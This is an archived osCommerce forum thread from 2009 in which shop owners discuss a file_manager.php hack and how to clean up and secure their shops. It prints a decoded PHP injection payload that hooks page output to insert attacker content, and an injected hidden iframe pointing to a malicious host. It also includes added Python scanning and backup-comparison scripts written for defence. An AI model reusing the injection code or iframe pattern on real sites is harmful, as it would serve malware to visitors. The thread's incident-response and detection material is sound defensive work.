spooks (Author) Posted September 15, 2009

My last post here shows how to prevent this, see http://www.oscommerce.com/forums/index.php?sho...c=344272&hl= for details on this nasty hack, I hope u have a site backup!!

Decodes to:

    // Run once per request, and only if output buffering is available
    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
        $GLOBALS['sh_no']=1;
        // Load the dropped file, which is expected to define gml()
        if(file_exists('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php')){
            include_once('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php');
            if(function_exists('gml')&&!function_exists('dgobh')){
                // Fallback gzdecode(): skip the gzip header, then inflate
                if(!function_exists('gzdecode')){
                    function gzdecode($R20FD65E9C7406034FADC682F06732868){
                        $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
                        $R60169CD1C47B7A7A85AB44F884635E41=10;
                        $R0D54236DA20594EC13FC81B209733931=0;
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){
                            $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                            $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
                            $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){
                            $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){
                            $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){
                            $R60169CD1C47B7A7A85AB44F884635E41+=2;
                        }
                        $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
                        if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){
                            $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
                        }
                        return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                    }
                }
                // Output-buffer callback: insert gml() output right after <body>, or prepend it
                function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
                    Header('Content-Encoding: none');
                    $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                    if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){
                        return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                    }else{
                        return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                    }
                }
                // Pass all page output through dgobh()
                ob_start('dgobh');
            }
        }
    }

Sam

Remember, What you think I meant may not be what I thought I meant when I said it.
Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.

Jayman11 Posted September 15, 2009

Thanks Sam. I have one, unfortunately it may be out of date so I don't want to move it over. Right now I am going through the files 1 by 1 and removing the code. Now I just need to figure out which and where the files are that it put on that need to be deleted. Guess I need to delete the filename php to prevent this from happening again.

spooks (Author) Posted September 15, 2009

> Guess I need to delete the filename php to prevent this from happening again.

It's file_manager.php that u must delete !!! :huh:

Sam

Jayman11 Posted September 15, 2009

Lol that's what I meant.

cyberlaban Posted September 17, 2009

Hi, I have installed several of the security settings that have been recommended in this topic to my shop. I also believed that I had done enough testing, but when adding a new product (something I had not tested), the product information link (to an external page) won't work. When pushing on the link to "product information" you get redirected to the index page. Anyone who has an idea on how to solve this? All help really appreciated.

The security settings I have implemented are:

- Folders
- Security pro
- Renaming admin
- IP trap
- .htaccess

Brg Espen

swguy Posted September 20, 2009

I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

Contributions: Better Together and Quantity Discounts for osCommerce 2.3.x and Phoenix. See my profile for more details.

♥FIMBLE Posted September 20, 2009

> I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

I tried out your script, nice try but I feel personally it is too confusing for the newer users who will be led to believe that they have a hack when none exists. Too many warnings about eval, perhaps you should add a list of files known to use this? Good work though

Nic

Sometimes you're the dog and sometimes the lamp post

swguy Posted September 20, 2009

There is a list of files known to use eval - they're files from the default installation. See line 29 in admin/syscheck.php and add what you need.

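An allowlist-based scan of the kind discussed in the posts above, as an added example that is not part of the thread and is not the code of the syscheck.php mod. The signature names, the `ALLOWED` entry and the sample files are constructed for illustration; the patterns are modelled on the decoded payload and the hidden iframe shown elsewhere in this topic.

```python
import re
import tempfile
from pathlib import Path

# Signatures modelled on this thread: the decoded ob_start() payload in the
# first post and the hidden iframe found in index.php. Names are this example's.
SIGNATURES = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "decode-chain": re.compile(r"\b(?:base64_decode|gzinflate)\s*\(", re.I),
    "ob_start-callback": re.compile(r"\bob_start\s*\(\s*['\"]\w+['\"]", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    "hidden-iframe": re.compile(r"display\s*:\s*none[^>]*>[^<]*<iframe\b", re.I),
}
SCANNED_SUFFIXES = {".php", ".html", ".htm", ".js"}

# Hypothetical allowlist (relative path -> signatures expected in a clean copy).
# Fill it from a known-good install; this entry is a placeholder.
ALLOWED = {"includes/classes/stock_example.php": {"eval"}}


def scan_tree(root, allowed=ALLOWED):
    """Return {relative path: [signature names]} for hits not on the allowlist."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = {name for name, rx in SIGNATURES.items() if rx.search(text)}
        hits -= allowed.get(rel, set())  # drop what a clean copy is known to contain
        if hits:
            findings[rel] = sorted(hits)
    return findings


def build_sample(root):
    """Write a constructed shop tree: clean, allowlisted and injected files."""
    files = {
        "product_info.php": "<?php echo 'hello'; ?>",
        "includes/classes/stock_example.php": "<?php eval($template); ?>",
        "includes/header.php":
            "<?php if(function_exists('ob_start')){ob_start('dgobh');} ?>",
        "index.php": '<body><div style="display:none">x'
                     '<iframe src="http://injected.invalid/"></iframe></div>',
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, names in scan_tree(tmp).items():
            print(f"{rel}: {', '.join(names)}")
```

Because the allowlist is keyed by path and by signature, an allowlisted file that later gains a different signature is still reported.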
blr044 Posted September 21, 2009

> I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

In your instruction, you made this statement: Try this in a test environment prior to installing it on a live shop. I have seen other mods suggest the same thing. So am asking, how is this done, do we need to contact our host to have this done?

Thanks.

Bennett

spooks (Author) Posted September 21, 2009

> test environment, how is this done, do we need to contact our host to have this done?

It simply means set up a duplicate site elsewhere purely for testing, it can be with a separate domain, or, most simply, within a subdirectory of your site, then it can share the same dbase if u want. If installing within a subdirectory do not run the installer, as that will delete your existing dbase, just copy files & set up configure.php, filenames.php etc files manually.

Sam

cyberlaban Posted September 21, 2009

Hi All, I find it strange that no one has experienced the same problem as me when it comes to being redirected to the index page when clicking on the "more product information" link.... guess I just tweaked the security settings too hard.... But if anyone has an idea on how to solve it I'll listen :)

Cheers Espen

This is what I have done:

> I have installed several of the security settings that have been recommended in this topic to my shop. I also believed that I had done enough testing, but when adding a new product (something I had not tested), the product information link (to an external page) won't work. When pushing on the link to "product information" you get redirected to the index page. Anyone who has an idea on how to solve this? All help really appreciated.
>
> The security settings I have implemented are:
>
> - Folders
> - Security pro
> - Renaming admin
> - IP trap
> - .htaccess

spooks (Author) Posted September 21, 2009

Your error is not related to security, & likely nothing to do with any of the contribs u added. Likely u created a coincidental error, your error is typical of many badly coded templates. Create a new thread with error & code plus link to faulty page.

Sam

mycommerce2 Posted September 22, 2009

I just installed osCommerce 2.2 RC2 and everything looks good. I'm very new at this. I read your post here, about securing your site. Although this tells me WHAT I need to do, I'm not sure HOW to do it. With my host (Just Host) I know how to go into File Manager and see my folders and files, but I don't have a clue on where to start to implement the security measure(s) in the link I cite above.

Can someone tell me HOW (what coding do I need to add or modify) and in WHICH files do I need to add or modify coding. How do I access these files. Do I need to implement ALL of the security measures at the link above? Please give me as much detail as you can for each question.

I really appreciate your help.

cyberlaban Posted September 22, 2009

> Your error is not related to security, & likely nothing to do with any of the contribs u added. Likely u created a coincidental error, your error is typical of many badly coded templates. Create a new thread with error & code plus link to faulty page.

Thanks for the feedback. I will post a new thread with link etc. The only thing I have done besides adding the security settings is a Norwegian language pack and an added payment module. Could it be the Norwegian language pack then??? I was so sure that it had something to do with the security settings...

Cheers Espen

spooks (Author) Posted September 22, 2009

They are all contributions, you just follow the instructions!!

How do I install a contribution http://www.oscommerce.com/forums/index.php?sho...=0#entry1432157

Sam

pretzi Posted September 30, 2009

Sam, you're doing a GREAT JOB, but - Oh, boy, this is going to be quite an afternoon - I can sense all this like a "your site will be bulletproof but will cease to run" kind of thing. I'm expecting tons of "Fatal errors", blank pages...you name it. Hope not. Can you, please, tell of any possible conflicts - with PayPal for example. Thanks!

spooks (Author) Posted September 30, 2009

> any possible conflicts

There should be no conflicts with most, refer to relevant support threads for each. Some, like security pro, have inbuilt measures to avoid conflicts. :)

Sam

Guest Posted October 10, 2009

Sorry if this is OT. Is yacybot a bona fide spider? Got three http errors in a row from different ips. Eg below

    Site: http://xxxxx
    Error Code: 400 - The request could not be understood by the server due to malformed syntax.
    Occurred: 10/11/2009 1:12:40
    Requested URL: http://xxxxxx/mod_ssl:error:HTTP-request
    User Address: xxx.xx.xx.xx
    User Agent: yacybot (amd64 Linux 2.6.28-15-generic; java 1.6.0_0; Europe/en) http://yacy.net/bot.html
    Referer: http://xxxxx:443/

spooks (Author) Posted October 10, 2009

> Is yacybot a bona fide spider?

Does this help? yacy.net/bot.html

Sam

madstarr Posted October 12, 2009

Please help identify hack. This morning my osc site had an error on the main index page

    Parse error: syntax error, unexpected $end in /data/13/1/102/19/1265997/user/1350825/htdocs/msrparts_com/sfmparts/index.php on line 384

When I FTP into the site I see that a new index.php had been replaced this weekend. I am theoretically the only one with access to the osc site or the ftp site. Can anybody give me insight as to how this may have happened and if there is a way to find out when, how, or where from this file came. I am assuming that the filemanager may be an issue as discussed in this thread and am making attempts to put in place the suggested security measures.

Thank you.

spooks (Author) Posted October 12, 2009

> Please help identify hack. This morning my osc site had an error on the main index page Parse error: syntax error.....

It's impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!! If u find new code on the page that has led to this, posting that alien code would be more useful. Apply all security advised & thoroughly check your site. Of course making backups as well, if not already done, is essential.

Sam

madstarr Posted October 12, 2009

> It's impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!! If u find new code on the page that has led to this, posting that alien code would be more useful. Apply all security advised & thoroughly check your site. Of course making backups as well, if not already done, is essential.

Thank you Sam. Part of my concern is that I have not worked on this site in several weeks and the index.php file that was on the server was updated or uploaded October 10. That is why I am trying to figure out how this could have happened. I compared the file that was uploaded with the one that I uploaded on 09/23. The only difference is on Line 55. The original 09/23 reads:

    </head>
    <body>
    <!-- header //-->
    <?php $tab_sel = 2; ?>
    <?php require(DIR_WS_INCLUDES . 'header.php'); ?>
    <!-- header_eof //-->

and the one from 10/10

    </head>
    <body><div style="display:none">imoobdtmglzyfqfzsftbgwbpkcgwnef<iframe width=274 height=708 src="http : // your-bio . ru : 8080 / index.php" ></iframe></div>
    <!-- header //-->
    <?php $tab_sel = 2; ?>
    <?php require(DIR_WS_INCLUDES . 'header.php'); ?>
    <!-- header_eof //-->

Also in the 10/10 version of index.php the last lines of the code have been deleted. From <!-- right_navigation //--> on is no longer there.

    </td>
    <td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0">
    <!-- right_navigation //-->
    <?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
    <!-- right_navigation_eof //-->
    </table>
    </td>
    </tr>
    </table>
    </td>
    <?php } ?>
    </tr>
    </table>
    <!-- body_eof //-->
    <!-- footer //-->
    <?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
    <!-- footer_eof //-->
    </body>
    </html>
    <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

Thank you in advance for your assistance. And please excuse my amateur knowledge.

spooks (Author) Posted October 12, 2009

> <iframe > http: // your - bio. ru: 8080 / index . php

Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.

I can't find too much on the hack in question, other than google reports that the target contains viri, fortunately the error caused means no-one will have seen the page.

Check all your files & look for added ones, esp in images folder

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

It's likely many files affected, you may also have hidden files added that u can't remove, best get host to wipe site & restore with your backup, then add security.

Also note the better hosts keep daily backups, some don't charge for a restore either.

Sam

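Checking for added and changed files against a backup, as advised in the post above, sketched as an added example (not code from the thread or from osCommerce). The function names, the `images` upload folder default and the two sample trees are assumptions constructed for the demonstration.

```python
import hashlib
import os
import tempfile
from pathlib import Path

SCRIPT_SUFFIXES = {".php", ".phtml", ".pl", ".cgi"}  # not expected among uploads


def snapshot(root):
    """Map each file's path relative to root -> SHA-256 of its contents."""
    digests = {}
    for folder, _dirs, names in os.walk(root):  # os.walk also returns dotfiles
        for name in names:
            full = Path(folder) / name
            rel = full.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(full.read_bytes()).hexdigest()
    return digests


def compare(backup_root, live_root, upload_dirs=("images",)):
    """Diff the live shop against a known-good backup taken before the incident."""
    good, live = snapshot(backup_root), snapshot(live_root)
    added = sorted(set(live) - set(good))
    return {
        "added": added,
        "removed": sorted(set(good) - set(live)),
        "modified": sorted(p for p in set(good) & set(live) if good[p] != live[p]),
        # New script files inside upload folders such as images/.
        "scripts_in_uploads": [p for p in added
                               if p.split("/")[0] in upload_dirs
                               and Path(p).suffix.lower() in SCRIPT_SUFFIXES],
        # New dotfiles or files in dot-directories, easy to miss in a file manager.
        "hidden": [p for p in added if any(s.startswith(".") for s in p.split("/"))],
    }


def write_tree(root, files):
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


def demo():
    """Constructed backup and live trees; returns the comparison report."""
    clean = {"index.php": "<body>\n", "images/logo.gif": "GIF89a",
             "includes/footer.php": "<?php // footer ?>"}
    infected = {**clean,
                "index.php": "<body><iframe src='http://injected.invalid/'></iframe>\n",
                "images/thumb.php": "<?php /* dropped file */ ?>",
                "includes/.cache/style.css.php": "<?php /* dropped file */ ?>"}
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        write_tree(a, clean)
        write_tree(b, infected)
        return compare(a, b)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

The comparison is only as trustworthy as the backup, so the baseline should be a copy taken before the first sign of tampering.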
madstarr Posted October 12, 2009

> Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.
>
> I can't find too much on the hack in question, other than google reports that the target contains viri, fortunately the error caused means no-one will have seen the page.
>
> Check all your files & look for added ones, esp in images folder
>
> Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.
>
> It's likely many files affected, you may also have hidden files added that u can't remove, best get host to wipe site & restore with your backup, then add security.
>
> Also note the better hosts keep daily backups, some don't charge for a restore either.

Thank you very much for your help. I am getting my files restored right now. I believed that this was the problem. In your opinion was this done through the file manager vulnerability you discussed?

Thanks again

Guest Posted October 13, 2009

> Does this help? yacy.net/bot.html

Yeah read that before I posted. It says it is a robot and obeys robots.txt, but if it did it would not get the http://xxxxxx/mod_ss...or:HTTP-request error. Anyway, it doesn't matter. I stopped it in htaccess.

Archived
This topic is now archived and is closed to further replies.